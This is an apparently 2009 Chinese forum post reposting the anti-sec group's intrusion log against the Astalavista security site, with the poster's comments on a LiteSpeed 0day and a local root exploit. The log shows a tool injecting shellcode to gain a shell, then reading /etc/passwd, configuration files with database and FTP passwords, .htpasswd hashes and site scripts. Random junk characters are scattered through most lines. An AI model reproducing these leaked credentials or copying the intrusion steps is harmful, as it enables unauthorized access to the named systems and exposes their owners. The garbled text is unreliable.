里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。4 V4 ?3 A% S1 r% @8 h: _! o1 |
& i( i. Y2 j, b: i7 z& n6 w4 U[root@front3 ~]# curl -I litespeedtech.com
* s/ ]9 `" [. G3 M9 v/ P7 ]- WHTTP/1.1 200 OK- W/ X- Q! g w3 l1 B0 K
Date: Fri, 05 Jun 2009 22:54:51 GMT
' j/ D* z3 R* y1 ?" m1 }Server: LiteSpeed
- S0 z: E" a3 ]) k; |" G2 D! G3 v; w1 Y; H
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-' n2 {4 Q9 a5 K5 n
$ {7 {. }6 Q% z& I有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。" [, y* n& J) s9 E
! r5 Q* G6 b/ v$ v- Z
6 z) K+ s" I) q/ j9 x, [5 w& M/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ * Z6 g, S+ p3 a# b/ C
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \: [8 g2 T: P. @6 V& _+ \2 ^6 i
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \' l' p4 d6 K: u" [
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
3 U6 J: x! J. X& L2 `- I7 A* O, V \/ \/ \/ \/ \/ \/ \/
. [6 e8 P% m) t8 z' M The Hacking & Security Community
+ K8 K5 ]5 b% J7 {7 J4 |[+] Founded in 1997 by a hacker computer enthusiast
, X/ P1 e1 W9 h% c[-] Exposed in 2009 by anti-sec group7 T1 Z4 g& l9 `, V q, R$ D# {
" o% V/ k8 U3 yFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
* L+ f8 r5 w. A, y- t>> 03. Who’s behind the site?" n4 b1 y* W# y Y% R M
>>
+ G* |. i0 ~( H. M2 I>> A team of security and IT professionals, and a countless number of contributors from all over the world.
) ]6 S3 u, J0 g Y, T
% Z/ e' x6 o, i( ^/ o) D5 P% @ C>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
6 O+ U# x/ a/ ?3 }0 r* ~+ g9 j>>& M9 @) N4 `9 R6 p
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
* k$ q3 u' v1 G' P+ N$ q0 |military institutions.4 Z6 }; Z' ]0 ~% n0 X! m
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
; ] l2 ?0 I) @4 O- A9 }6 Z7 _
2 ?' A: S# C+ p8 K* S. U, }Why has Astalavista been targeted?( \- _9 y. `. Y* j
) g, @ p- l: K3 B0 a
Other than the fact that they are not doing any of this for the “community” but) l9 B* ^# I% @( J5 ^7 q
for the money, they spread exploits for kids, claim to be a security community2 ?) y1 l( Z% {7 I
(with no real sense of security on their own servers), and they charge you $6.66' c4 i- Q2 N( ^$ P' t
per months to access a dead forum with a directory filled with public releases3 V+ M; V7 k @% x' G. B
and outdated / broken services.6 \& Q" v" f5 r9 M+ ~
! u2 ?8 u; w$ k' FWe wanted to see how good that “team of security and IT professionals” really is.( s& n: i* B+ s, v5 X; s
9 {: d6 V6 U( u/ p" j' B" L
Let’s begin.
7 h5 x9 r. s4 B" f2 }5 r. l+ b: `8 L& P( y: i: L2 a; y# c8 H+ H, e# K
anti-sec:~# ./g0tshell astalavista.com -p 80
& j6 ^' ~) m; O& U6 h[+] Connecting to astalavista.com:80: ?$ l6 Q8 e% f$ \# Z# K; T
[+] Grabbing banner…
" Q4 n! ~' \. K! z0 M: h7 qLiteSpeed
, k) d2 s5 ]: B- {3 G* [9 l[+] Injecting shellcode…! ~' x$ |! W% f
[-] Wait for it( t4 V. T1 k6 ~( B& j* O# O4 J5 U8 |7 ~2 A
9 C( X% X/ I" x n' S7 e5 A1 c[~] We g0tshell
& ]4 G$ j- [( Y0 T6 n% i0 k9 yuname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
% p. g# V0 T, ?2 qID: uid=100(apache) gid=500(apache) groups=500(apache). L$ |( e# T. [
% N4 g! j" h1 @: d8 T
sh-3.2$ cat /etc/passwd
. K7 l% k7 c) }" {, H& z: proot:x:0:0:root:/root:/bin/bash0 o: @7 L) Z, ~7 D, P
bin:x:1:1:bin:/bin:/sbin/nologin$ Y& M; p! j/ |0 [6 F
daemon:x:2:2:daemon:/sbin:/sbin/nologin2 F5 B) Q: e U1 Z E3 v
adm:x:3:4:adm:/var/adm:/sbin/nologin
1 D% _* O" @& f7 a/ L9 tlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+ S3 g% I7 {0 y% Ysync:x:5:0:sync:/sbin:/bin/sync( o+ x0 I4 N7 a8 [
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
2 P1 [; w) g7 nhalt:x:7:0:halt:/sbin:/sbin/halt
: F; `. E- W4 |0 Email:x:8:12:mail:/var/spool/mail:/sbin/nologin
G6 v4 ?. P }# E! m; g* n% H2 Xnews:x:9:13:news:/etc/news:
* G, P- B3 t, u& N0 T, Luucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
8 h. t2 W, x) c9 ?( p9 qoperator:x:11:0 perator:/root:/sbin/nologin
) e2 b$ P. C# L# Z& j Q2 Jgames:x:12:100:games:/usr/games:/sbin/nologin' l, L0 s3 G2 P+ E$ n$ q+ l% q% l4 a
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin; Q+ ?: t" L6 H. O
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
1 Q- S$ b v2 Enobody:x:99:99:Nobody:/:/sbin/nologin
* c: k7 E1 F; c \( n$ arpm:x:37:37::/var/lib/rpm:/sbin/nologin: Y- e, _, w) N# X7 i) d7 B" ~) ?
dbus:x:81:81:System message bus:/:/sbin/nologin
8 u2 ^' Y! x& g) ~. ^nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
& k' O Q0 |/ s( _mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin9 L6 ]5 {/ A* t
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin7 [0 [1 F7 D) o9 g, t9 G' q4 _
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
: ^+ b' k0 C6 J& j/ b3 t* ohaldaemon:x:68:68:HAL daemon:/:/sbin/nologin4 _& }8 Q$ v1 q
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
4 C7 { O5 J, a+ b% y& U+ yrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
7 Q/ l& w6 c: E1 @. G2 b* p" _nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin6 D0 z' L6 y! J8 t9 B# A1 y( Z
sshd:x:74:74 rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
( z! X8 w( F; A0 B. Upcap:x:77:77::/var/arpwatch:/sbin/nologin" K5 ]' m) [2 P8 X
named:x:25:25:Named:/var/named:/sbin/nologin
* K1 y. P$ _+ @' V1 q/ e( Vapache:x:100:500::/var/www:/bin/false- x8 d' Q3 l7 E# E4 S
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
$ u! q$ r- @: X$ @6 y( vmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
5 c+ N' p6 t2 \" j! Rwebapps:x:500:501::/var/www/html:/bin/bash) Q) n9 i) s1 e
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash2 o7 m8 t# M; N- j& P5 }
admin:x:501:502::/home/admin:/bin/bash
% {% F: |$ S! { kjon:x:502:503::/home/jon:/bin/bash
* \6 t; n* m& X; q- ucom:x:503:504::/home/com:/bin/bash* o8 a4 {4 ~) K; M8 j6 b, u
ntp:x:38:38::/etc/ntp:/sbin/nologin
* d5 h+ ~ L! I* w, y' R; X; ` xais:x:39:39 penais Standards Based Cluster Framework:/:/sbin/nologin
$ g) V9 f* ~" y2 ]/ U3 q+ E6 mastanet:x:504:505::/home/astanet:/bin/bash' G7 [( j1 H4 s7 b
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
5 a* ?$ @. c# g0 Iavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
9 k3 q8 k4 ~9 J' I; V0 J" p, b$ I7 E2 b& R& F s$ q* H. U2 M
sh-3.2$ cat /etc/hosts: ~( W3 v) K/ e* r6 i
# Do not remove the following line, or various programs
( }) ?, Y9 r# Q6 m9 Q2 c4 P+ V# that require network functionality will fail.+ t# ?* F9 `: V5 J) ^9 I+ h% M
127.0.0.1 localhost.localdomain localhost7 o7 L6 w' T, Y
::1 localhost6.localdomain6 localhost6
+ a" ~. X- M) F- f, Z* S/ d. f7 ]/ s80.74.154.172 asta1.astalavistaserver.com# o. l `" m/ G3 u7 p7 m5 b: x+ Z
$ @ Z8 Z* U2 u- [! [
sh-3.2$ pwd& j% L/ q/ ], r
/home/com/public_html6 G- N, f. k, F. a: C, V- V( s+ F
& ~6 i4 V9 I% Jsh-3.2$ ls -la
" v7 r8 [) d6 F! g! q7 ttotal 18460
) B1 J- G/ H" b# S+ edrwxr-xr-x 30 com apache 4096 May 28 17:06 ." N( L3 g5 |: P
drwx–x–x 11 com com 4096 Jun 25 2008 ..
* {! q: X% M: {+ A& xdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin# M: V% g9 \7 m0 A. z" |
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache0 b% l* O9 y' a* B/ R0 `$ f
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin$ j$ S l3 {6 t) T0 m
drwxrwxrwx 2 com com 4096 May 19 00:50 config. x4 |8 F. b& o$ ]1 g& A: u
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
( O+ `% @/ a* V7 \! }4 _, Idrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules: v# S3 E$ p% i2 |; |1 P# X
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing$ l! a$ T7 g3 \
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
. z. x/ J. L/ |8 Z3 Q5 ^" Xdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__$ v4 _8 ~% s n( i/ I( D x) {+ D
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
& L! W. `: m l) Udrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
* i U! s9 O1 Ldrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
* b; P7 _( r% F d" h: d-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
0 B- T( n, }; L g, o: P+ gdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed1 ] u2 h- T; W; U" u: i" b" s
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
* ], b9 K8 T; f-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak4 i* T& _6 i" W0 t2 t& e; [) j
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak' U0 x% h) {, O# Y4 k6 o, L# A1 Z
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool/ j& N7 ]1 u9 r1 t. N
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images6 s5 @1 E) z' K& N) y1 Z4 S9 {; ~) K# V
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
9 z I( A' f2 x- b, mdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
8 C- |* c- m, e) v5 I8 Zdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang8 [* {: c% e/ w0 K u
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
9 e$ b7 v0 `, k9 J& kdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media" P0 l/ n' Z) C2 l* {
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
& d& ~+ v6 D% U( N6 Adrwxr-xr-x 34 com com 4096 May 28 16:30 modules& Z$ J, M# E! z6 C
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
- C4 s0 J2 ?- K% r/ p/ Tdrwxrwxr-x 22 com com 4096 May 28 17:06 _new1 H8 J- H3 t5 b' m" G
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
: W# `1 R2 d ^4 Wdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy& J, q7 L! M1 m9 F) t
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
0 |# s4 S" o" o& g& K9 X-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt ?; ~3 p {: P- w8 Y% i( N
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
- I. _& I% O2 t+ d/ _# f6 }-rw-r–r– 1 com com 223 Mar 30 15:32 test.php2 A. _0 C! N+ E" ]4 v- B4 i( l, R
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes& o$ T& c8 ~. ?; A+ D% o
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
! Y! n# ~5 A/ T' t: x. Jdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
; ]5 }4 c2 |! T4 D0 G
( {0 d; A7 G/ t$ ssh-3.2$ head -20 index.php$ b" K3 I! y; s3 K5 _1 E; @4 P
<?php! H2 Q; {6 m6 h. K% d4 n
8 | \, a3 x& Y/ W0 y C
/**
E2 P# E- L5 g, v4 J* The main page for the CMS
! i0 y: }. C" }$ a2 y5 N9 ^/ M* @copyright CONTREXX CMS - COMVATION AG+ I( \* C% ]' n% b; N t( M! D
* @author Comvation Development Team0 b5 K3 F5 A6 s. L5 E
* @version v1.0.9.10.1 stable
' Q `0 @0 x5 L+ @" \2 X4 I* @package contrexx
$ j* F3 K+ G0 h( ~' O* @subpackage core! T5 |# M5 ]# A5 V' u% J- b9 M1 C
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
/ N) ]8 j7 s/ ^- i: H6 ^0 M* @since v0.0.0.04 s0 e: ]7 f, Y1 G0 g$ g9 P& Y# u
* @todo Capitalize all class names in project
c8 Z- C3 i) S; V: P* @uses /config/configuration.php8 W) I! `2 i6 `
* @uses /config/settings.php
! ]" b: D" f8 L( @* @uses /config/version.php
5 u6 r1 z9 @( ?, Y( T5 h" ]* @uses /core/API.php
* K2 m( C- x4 |& K* @uses /core_modules/cache/index.class.php I5 q3 I y7 K4 C/ g: ^
* @uses /core/error.class.php" B$ L# b9 _2 N, ?
* @uses /core_modules/banner/index.class.php u1 z/ Z# a: q- U7 f; T% v8 H0 V
* @uses /core_modules/contact/index.class.php
* E; @3 Y/ T. N2 ~! U" l/ K# ^/ \0 m8 b w- q' T
sh-3.2$ cd config/
) o9 e' g- B: ~4 w! m6 X+ Nsh-3.2$ ls -la3 e) B/ Y# c: v' {! ^- A9 b# a
total 32
/ J( m) O; F; M: cdrwxrwxrwx 2 com com 4096 May 19 00:50 .
% F! I* [1 c0 e9 \. t* _3 g9 rdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
6 S' d1 m' k$ L3 x-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
/ L! Q. y7 N7 r9 j$ |' q- K-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
* J+ E! g8 ^3 x4 M% }+ }4 P) P8 j-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php: b B; @4 G9 C6 g G. W" Z h
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
0 _1 p4 Q8 j% M% A% n4 i
$ S5 j2 ~' o- V0 u2 Z- ysh-3.2$ cat configuration.php
3 R- y' A I( O' H6 |2 G& N[snip]
" |% I- g, E. j2 t$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
4 J8 E. U8 e) P( c. M$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
2 `' E5 E* ?& n: g$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix0 t8 o) ^$ R. U4 L
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
# b' U, @8 i4 K) o6 C" g2 ^" `" C$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password; v$ D2 W6 u# R
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
! F6 w$ ^, r5 N% l0 F% \: p7 u9 W5 T$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
5 [' d9 c6 O* B/ D0 f[snip]: A% A$ a/ R. X: h% L7 B: L
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
+ w+ Z% ~" Y+ Z$ T0 ~; F# v$ @+ d$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
* W6 f; f: Y: x3 F: A$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost' x5 z4 u1 c7 m
$_FTPCONFIG['port'] = 21; // Ftp remote port+ Y0 z( `3 X* f9 C c3 p7 E
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username& r/ N) X1 ]- u6 U: ?1 m4 w8 D
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
& ^$ ~, |9 O( q) S' V/ _$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
# [. v# g4 T7 Q" J9 G
$ _) g9 p% j" E0 D. ]sh-3.2$ cd ..
) g9 W! R; C. N# esh-3.2$ cd dvd/
9 [( C% N( f: x. n( d1 h: `; |0 lsh-3.2$ ls -la
3 ]$ ^7 J2 W9 z* b+ stotal 2913780
8 r) A# h8 q/ U/ B+ a* S* o9 g9 ndrwxr-xr-x 2 com com 4096 Sep 9 2008 .' l3 J6 ]# A6 Q7 F: k
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
% H* }1 Q, x5 m3 s-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
1 {% r* K/ r$ d. G8 V-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
* F7 B1 F+ q0 t: S4 K7 J( G7 m-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar1 }4 W. v3 h' J) \% f
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
3 S0 y8 v! {; S$ H0 \
1 H' K3 Q' I- x3 Esh-3.2$ cat .htaccess+ s8 w4 o1 g$ U' r- _4 j% \2 K
authType Basic
& \3 W* i. _; `! LauthName DVD7 k5 }( w" ~9 g
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
1 _7 m5 } e5 U/ o2 |require valid-user. N- O' R G' i- T, a" A
5 v! d$ ^0 P8 ?6 tsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
. H. n# j/ }" n* x6 LDVDdownload:CRD8cuY6.MPT6! v( a8 h: G3 p+ F: M
DVDdownload2:CR8a36.wluFMg7 g: o2 z) R; {: s6 w% }: h9 H! ?
$ A$ @3 L$ L( k' ^sh-3.2$ cat test.php7 ?, M# V7 R9 \+ }- C& b6 G
<?php
: H$ f$ g! a/ U& i5 i$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;& E! x6 f) Y: M; [4 ?4 X4 m
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
5 K/ R! f9 S, U7 E$ g, lecho $url;6 ^8 t$ ?! a6 v* i% ^1 z( i8 |
?>9 V+ T5 P, H& i9 g9 K) ]
0 K7 c( j# T; C$ a$ y% g2 m+ X2 z
sh-3.2$ cd modifications/
9 B6 Y+ \1 X2 D' h+ qsh-3.2$ ls -la
: D" G$ o: F' A2 N3 o! ]3 M$ S1 y; D7 g) dtotal 32
$ d+ J5 W$ H3 bdrwxr-xr-x 8 com com 4096 May 11 12:48 .
?% z7 J' v$ ndrwxr-xr-x 30 com apache 4096 May 28 17:06 ..$ s D1 Z( E5 f; ]! r" [
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
( [* s# o5 @! s3 ?drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs' i- S. m9 h6 J' r2 [4 i! L
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools0 p2 J9 _) p y3 ^ I
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc/ j5 j' B2 g4 R2 J) Q$ I
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
& @9 C4 O# I+ t0 d. F( M" _- Idrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
! c& P) Z8 a- C+ z0 g6 |( Q! q+ f, Z+ Y0 _* r3 U1 z
sh-3.2$ ls -R
7 \6 i {$ Y! J B5 e.:5 U' [& g. K: ~, r% }0 S
com_avtng cronjobs onlinetools pjirc search _tmp6 P9 f1 ]8 G; V, O$ \
@3 t8 j% g- @' R* _7 Q./com_avtng:2 i! h" y! k7 v9 T. p9 W( d) `$ y
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
! [2 M& J. @9 y' s# I% x8 z* x
, H! C6 e, q c) w./com_avtng/scripts:
) y! U* m0 S" ?2 l0 }5 ^popunder.js
( t4 Y) F) ^* l9 c5 R% {% T9 U7 `! J* X3 x
./cronjobs:, Q/ m- V6 D- Y w
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp" }: S, X( @ {* s& t5 @
& I6 J# [. W( \& l) n! H8 A( A./cronjobs/tmp:
5 [# H, r J4 }' i9 Y$ L. Icontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv+ O- S0 h W% }/ u- u3 x8 R
' ]9 K* _4 ^% ]9 B) z3 C% b4 m
./onlinetools:& X# P8 @6 I1 y, t3 s
index.php( f( F- R5 {8 R7 V% ]2 i
% f7 p. j5 e6 i3 S' Y/ r" J$ g4 d./pjirc:
3 e" V P" s' z, Y; Ma_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt: y- C' w. f/ l( B- K. N; p/ Z
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
6 S$ q6 U. _& o1 cbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd! `0 W; T) f3 U+ K
- L& y0 ^; H. Z. t- ~+ o L./pjirc/img:. ?8 ~- M U4 \2 _/ c$ Q/ r0 n& }& [: T9 M
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
/ l$ |7 F+ j0 a% R5 rarbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 8 Y# g9 E) I3 V2 ~" C
verre-eau.gif
) V( g+ N# l4 Y! v, a) Margh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
; |6 s5 T o# O: c3 u6 Averre-vin.gif& [9 ~! e7 }' t4 n! J6 Q
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
: O N3 e+ G/ i4 Q7 O' p. abiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif' _$ M( E3 l, \6 h0 M
* P, o7 y- R y5 l./pjirc/snd:
" G6 ~; l9 d7 w# kbell2.au ding.au
7 p V ]7 K, ~6 x. J8 X0 R3 s; }: U; s- ]! W: n6 U4 [6 {& }* m2 J
./search:! X; U# Z" o) i( b3 `6 P& t
searchEngines.php search.php- b) {& Y$ j% h. S! T
4 [3 [* y: f8 a# W" v( z
./_tmp:
1 F( C* s- T. ]defaultPorts.php defaultPorts.txt; G* t# |& n8 m: S6 M& n5 g
2 m& {$ e+ S- n8 J$ F' v- Csh-3.2$ cd cronjobs/( X3 ]- u0 X; o x1 O6 V2 p
sh-3.2$ cat exploits.php; R, h0 c) n' D. Z! p
[snip]$ R, m; F$ a% Y( t
$categories = array();
J1 @* M# m+ ~1 X. h8 U" \$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;# I, P+ z' A( X# s
$expolits = file($milw0rmFile);
2 L! Q7 q2 S1 g" l5 c" X9 W$ B$comExploits = array();
1 j( C) b+ q K' `% o' \[snip]
P' o: t6 ^5 D; \+ H// manage data
; c: l% M! \* |for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640, }9 V. Y' J# ^% z- p: {; W9 {2 G
+ X+ U. g9 i5 J- f( N, ?8 \0 B0 Z
// get path and title
2 ~' g6 D" d, F1 c, g $expolits[$x] = trim($expolits[$x]);- r4 q. C' Q; y+ k" T
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
$ ^' h9 v* w' T: O2 y $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);3 g0 v! y6 Z! M, x: J2 r
e, K( P; T/ i- l) k
// check if file exists3 X. l; h9 g) |3 z
if (file_exists($path)) {4 w4 H7 g8 J; F- q
# r+ M0 F3 K$ P8 Z $text = file_get_contents($path);0 Q9 h( R9 z5 O, v5 G; v' D% R
9 m8 q$ L- h- V4 o
// get content and date
) s1 n8 g1 P) P+ w4 y& K3 T# | //$text = htmlspecialchars($text, ENT_QUOTES);
9 ^8 ~% e; N/ G$ o3 S# A $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));! C% g1 o7 Y5 C+ i* k8 w b
if ($tmptext != ”) {" u6 ~" X2 T K1 j1 ^2 b
$text = $tmptext;
" p. X5 b5 ]0 E2 ~! d1 o: p } else {* e" J% }3 L3 Z+ P0 q1 ^2 q; h
$text = addslashes(htmlentities($text, ENT_QUOTES));8 J6 C0 \- Y# ~7 u
}3 {+ l, v$ z* q9 o4 |3 I
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
( i5 n0 k2 L: u* f $tmp = explode('-', $date);
4 \0 E/ A8 i$ P; C" {7 y: z $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
) |+ b0 k; a" J, a $cat = getCategory ($path);
8 r: Z0 N1 S" U' G- C $ext = pathinfo(basename($path));# R2 L f |% h3 k
$ext = $ext['extension'];* W9 R; _$ u9 }* Z" D/ r
$qStr = ”
% t* ~- N6 t/ Q. t SELECT `id`; R& p- q+ s6 f2 R* s0 _
FROM `contrexx_module_exploits`
( d! ? K' i. f6 I WHERE `title` = ‘” . $title . “‘" g6 ]) Q7 N4 P4 e8 X
AND `date` = ‘” . $date . “‘4 Q% S8 z0 J; `5 F) {
“;( n2 w: m4 k" I2 r9 W7 ?
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
1 d9 F; D7 p5 ` $q = $_objDB->query($qStr);! l# D, D7 _7 u2 y# p- c
2 p) ]: {% F) E5 n& V1 N if ($q->numRows() == 0) {
+ `/ k, T2 i {9 Q: Q# K3 g& S/ k4 V. ?% r1 @/ z6 l; k
// prepare array& c0 k, Z6 L o9 r& R: B
$comExploits[$x]['date'] = $date;3 S2 c' d+ ` _, }
$comExploits[$x]['title'] = $title;
; H& a3 y. b4 L $comExploits[$x]['author'] = ‘milw0rm’;
; ~3 `+ {$ ?2 N* J $comExploits[$x]['text'] = $text;
; r; F% o; H% e; ]2 V7 p $comExploits[$x]['source'] = $ext;& E4 U! e8 m1 |! R
$comExploits[$x]['url1'] = ”;' F3 a/ n( A- u% `& M
$comExploits[$x]['url2'] = ”;- e5 d' S3 i! i" [& h3 p' |# ]6 _
$comExploits[$x]['catid'] = $cat;' I0 K9 Z# y E3 Z9 V3 h; x/ E
$comExploits[$x]['lang'] = ‘2′;7 r c1 x; f% G- H- E' T3 u
$comExploits[$x]['userid'] = ‘12′;) y1 | Z7 w g p, M) A
$comExploits[$x]['startdate'] = ‘0000-00-00′;& C1 r9 k) n4 b2 b
$comExploits[$x]['enddate'] = ‘0000-00-00′;
- T9 i& @( _# D6 x) u3 }+ H $comExploits[$x]['status'] = ‘1′;% \- X! \% E( k0 L5 i/ A* {
$comExploits[$x]['changelog'] = $date;8 u: l. s+ C8 [8 }, M- p: ]
6 J v% j H/ j, _' m( N( {
}
6 T0 H- C# Z( [* u6 ^+ @5 W; V[snip]6 G7 F/ F- {0 T' H
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>, Z' X7 o. F+ b- [* b
<rss version=”2.0″>
